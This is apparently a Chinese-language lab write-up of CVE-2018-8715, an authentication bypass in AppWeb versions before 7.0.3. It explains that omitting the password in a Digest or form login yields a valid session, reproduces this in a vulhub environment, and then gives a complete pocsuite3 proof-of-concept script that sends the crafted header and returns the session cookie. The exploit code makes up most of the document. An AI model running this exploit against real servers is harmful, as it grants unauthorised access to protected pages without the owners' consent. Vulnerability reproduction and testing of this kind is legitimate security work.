AppWeb認證繞過漏洞(CVE-2018-8715)
原理
AppWeb可以進行認證配置,其認證方式包括以下三種:
- basic 傳統HTTP基礎認證
- digest 改進版HTTP基礎認證,認證成功後將使用Cookie來保存狀態,而不用再傳遞Authorization頭
- form 表單認證
其7.0.3之前的版本中,對於digest和form兩種認證方式,如果用戶傳入的密碼爲null(也就是沒有傳遞密碼參數),appweb將因爲一個邏輯錯誤導致直接認證成功,並返回session。
漏洞環境
參考:[https://github.com/vulhub/vulhub/tree/master/appweb/CVE-2018-8715]
漏洞復現
利用該漏洞需要知道一個已存在的用戶名,當前環境下用戶名爲joshua。
構造頭Authorization: Digest username=joshua,併發送數據包。
攔截一下訪問
修改 Authorization ,提交訪問請求。
因爲沒有傳入密碼字段,所以服務端出現錯誤,直接返回了200,且包含一個session。
從這裏可以看出可以正常訪問。
利用session
1.設置這個session到瀏覽器,即可正常訪問需要認證的頁面:
效果圖爲 [https://github.com/vulhub/vulhub/tree/master/appweb/CVE-2018-8715] 中
這個我不知道在哪裏設置,沒有設置成功。
2.發送POST請求,添加session到HTTP 頭信息和用戶名後,發送數據包。
pocsuite的poc
python —> version:3.7
pocsuite —> version:3
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from collections import OrderedDict
import requests
from pocsuite3.api import Output, POCBase, OptString, register_poc, POC_CATEGORY, OptDict
class DemoPOC(POCBase):
vulID = '97181' # ssvid
version = '1'
author = ['sumo']
vulDate = '2018-03-14'
createDate = '2018-03-15'
updateDate = '2018-03-15'
references = ['https://www.seebug.org/vuldb/ssvid-97181']
name = 'AppWeb認證繞過漏洞(CVE-2018-8715)'
appPowerLink = 'https://www.embedthis.com/'
appName = 'AppWeb'
appVersion = '< 7.0.3'
vulType = 'Login Bypass'
desc = '''
其7.0.3之前的版本中,對於digest和form兩種認證方式,如果用戶傳入的密碼爲null
(也就是沒有傳遞密碼參數),appweb將因爲一個邏輯錯誤導致直接認證成功,
並返回session。
'''
samples = ['http://10.10.100.92:8080/']
install_requires = []
category = POC_CATEGORY.EXPLOITS.WEBAPP
protocol = POC_CATEGORY.PROTOCOL.HTTP
def _options(self):
o = OrderedDict()
o["username"] = OptString('', description='這個poc需要用戶輸入登錄賬號', require=True)
return o
def _verify(self):
result = {}
playload = "Digest username=\"{0}\"".format(self.get_option("username"))
get_headers = {
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
vul_url = self.url
if vul_url.endswith('/'):
vul_url = vul_url[:-1]
if "http://" in vul_url:
host = vul_url[7:]
elif "https://" in vul_url:
host = vul_url[8:]
else:
host = vul_url
get_headers['Host'] = host
get_headers['Authorization'] = playload
r = requests.get(url=vul_url, headers=get_headers)
if r.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['set-cookie'] = r.headers['set-cookie']
else:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['set-cookie'] = get_headers
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)